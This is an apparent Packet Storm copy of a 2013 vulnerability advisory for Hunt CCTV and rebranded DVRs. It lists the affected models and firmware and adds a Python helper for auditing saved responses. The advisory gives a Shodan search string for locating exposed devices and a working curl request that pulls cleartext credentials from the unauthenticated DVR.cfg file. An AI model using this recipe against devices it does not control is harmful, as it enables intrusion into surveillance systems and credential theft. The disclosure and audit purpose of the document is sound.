
Hunt CCTV Credential Disclosure

28 Jan 2013 00:00:00 | Reported by Alejandro Ramos | Type: packetstorm | Source: packetstormsecurity.com

Hunt CCTV Credential Disclosure affecting multiple vendors and models due to insufficient authentication leading to potential credential exposure

Related

| Reporter | Title | Published |
|---|---|---|
| Circl | CVE-2013-1391 | 29 Jan 2013 00:00 |
| Check Point Advisories | Multiple Products DVR Configuration Disclosure (CVE-2013-1391) | 21 Oct 2013 00:00 |
| CVE | CVE-2013-1391 | 30 Oct 2019 20:36 |
| Cvelist | CVE-2013-1391 | 30 Oct 2019 20:36 |
| Tenable Nessus | Hunt CCTV DVR.cfg Direct Request Information Disclosure | 6 Feb 2013 00:00 |
| Metasploit | Multiple DVR Manufacturers Configuration Disclosure | 30 Jan 2013 16:22 |
| NVD | CVE-2013-1391 | 30 Oct 2019 21:15 |
| OpenVAS | Multiple DVR Information Disclosure Vulnerability | 1 Feb 2013 00:00 |
| Packet Storm | Multiple DVR Manufacturers Configuration Disclosure | 1 Sep 2024 00:00 |
| Prion | Authentication flaw | 30 Oct 2019 21:15 |

`Hunt CCTV (and generics brands) Insufficient Authentication  
January 17, 2013 - A. Ramos <aramosf @ gmail . com>  
  
-- CVE ID:  
CVE-2013-1391 [reserved]  
  
-- Affected Vendors:  
Hunt CCTV (http://www.huntcctv.com/)  
** generic brands from Hunt **  
Capture CCTV (http://www.capturecctv.ca/)  
NoVus CCTV (http://www.novuscctv.com/)  
Well-Vision Inc (http://well-vision.com/)  
  
-- Affected Models:  
DVR-04 / DVR-04CH (HuntCCTV)  
DVR-04NC (HuntCCTV)  
DVR-08 / DVR-08CH (HuntCCTV)  
DVR-08NC (HuntCCTV)  
DVR-16 / DVR-16CH (HuntCCTV)  
CDR 0410VE (CaptureCCTV-HuntCCTV)  
CDR 0820VDE (CaptureCCTV-HuntCCTV)  
DR6-704A4H (HuntCCTV)  
DR6-708A4H (HuntCCTV)  
DR6-7316A4H (HuntCCTV)  
DR6-7316A4HL (HuntCCTV)  
HDR-04KD (unknown-HuntCCTV)  
HDR-08KD (unknown-HuntCCTV)  
HV-04RD PRO (Hachi-HuntCCTV)  
HV-08RD PRO (Hachi-HuntCCTV)  
NV-DVR1204 (NovusSec)  
NV-DVR1208 (NovusSec)  
NV-DVR1216 (NovusSec)  
TW-DVR604 (Well Vision INC Solutions-HuntCCTV)  
TW-DVR616 (Well Vision INC Solutions-HuntCCTV)  
  
Shodan dork: Basic realm="DVR" server: httpd -mini  
Shodan results: 46890  
Vulnerable: >70%  
  
-- Vulnerability Details:  
You can get the entire backup config with a simple GET. No authentication  
required.  
All information is in clear text: admin panel, DDNS config, PPPoE  
credentials, misc.  
  
Example:  
  
[aramosf@velouria data]$ curl -v http://x.x.x.x/DVR.cfg | strings | grep -i USER  
* Trying x.x.x.x... connected  
* Connected to x.x.x.x (x.x.x.x) port 80 (#0)  
> GET /DVR.cfg HTTP/1.1  
> User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.13.1.0 zlib/1.2.3 libidn/1.18 libssh2/1.2.2  
> Host: x.x.x.x  
> Accept: */*  
>  
< HTTP/1.0 200 Ok  
< Server: httpd  
< Date: Fri, 17 Jan 2013 05:47:02 GMT  
< Cache-Control: no-cache  
< Pragma: no-cache  
< Expires: 0  
< Connection: close  
< Content-Type: application/octet-stream  
<  
USER1_USERNAME=iam  
USER1_PASSWORD=sexy  
  
Vulnerable firmware (127 different ones):  
- 1.1.10 to 1.1.92  
- 1.47 to 1.51  
- 2.0.0 to 2.1.93  
- 3.0.04 to 3.1.92  
  
-- Disclosure Timeline:  
2011-09-?? - Vulnerability discovered  
2012-12-20 - Published in the book "Hacker Epico" (http://www.hackerepico.com)  
2013-01-15 - CVE Assigned  
2013-01-20 - Vulnerability reported to vendor  
2013-01-24 - Vulnerability reported to GDT (Spain)  
2013-01-28 - Public disclosure:  
http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html  
  
--   
Alejandro Ramos  
www.securitybydefault.com  
`
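
For auditing a DVR you administer, the following added example (not part of the original advisory) classifies a saved raw HTTP response to `GET /DVR.cfg` and reports which credential keys are readable without echoing their values. The function name and both sample responses are constructed for illustration; the key pattern and the `Basic realm="DVR"` challenge are taken from the advisory text.

```python
import re

# Printable-ASCII runs of 4+ bytes, the same idea as strings(1).
_STRINGS = re.compile(rb"[\x20-\x7e]{4,}")
# Key names follow the USER1_USERNAME / USER1_PASSWORD pattern shown in the advisory.
_CRED = re.compile(r"(USER\d+_(?:USERNAME|PASSWORD))=(.*)", re.I)


def audit_dvr_cfg_response(raw: bytes) -> dict:
    """Classify a saved raw HTTP response to GET /DVR.cfg (hypothetical helper)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(None, 2)
    status = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else 0
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()

    leaked = []
    for run in _STRINGS.findall(body):
        m = _CRED.search(run.decode("ascii"))
        if m:
            # Record the key and the value length only, never the secret itself.
            leaked.append((m.group(1).upper(), len(m.group(2))))

    if status == 401 and "www-authenticate" in headers:
        verdict = "protected"            # device demanded credentials
    elif status == 200 and leaked:
        verdict = "exposed"              # config served, cleartext credentials inside
    elif status == 200:
        verdict = "served-without-auth"  # file served, no known credential keys seen
    else:
        verdict = "inconclusive"
    return {"status": status, "verdict": verdict, "leaked_keys": leaked}


# Constructed sample responses (not captured from any real device).
EXPOSED = (b"HTTP/1.0 200 Ok\r\nServer: httpd\r\n"
           b"Content-Type: application/octet-stream\r\n\r\n"
           b"\x00\x01\x02USER1_USERNAME=example\x00\xff\x10"
           b"USER1_PASSWORD=constructed\x00\x03")
PROTECTED = (b"HTTP/1.0 401 Unauthorized\r\n"
             b'WWW-Authenticate: Basic realm="DVR"\r\n\r\n')

if __name__ == "__main__":
    for name, sample in (("exposed", EXPOSED), ("protected", PROTECTED)):
        print(name, audit_dvr_cfg_response(sample))
```
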
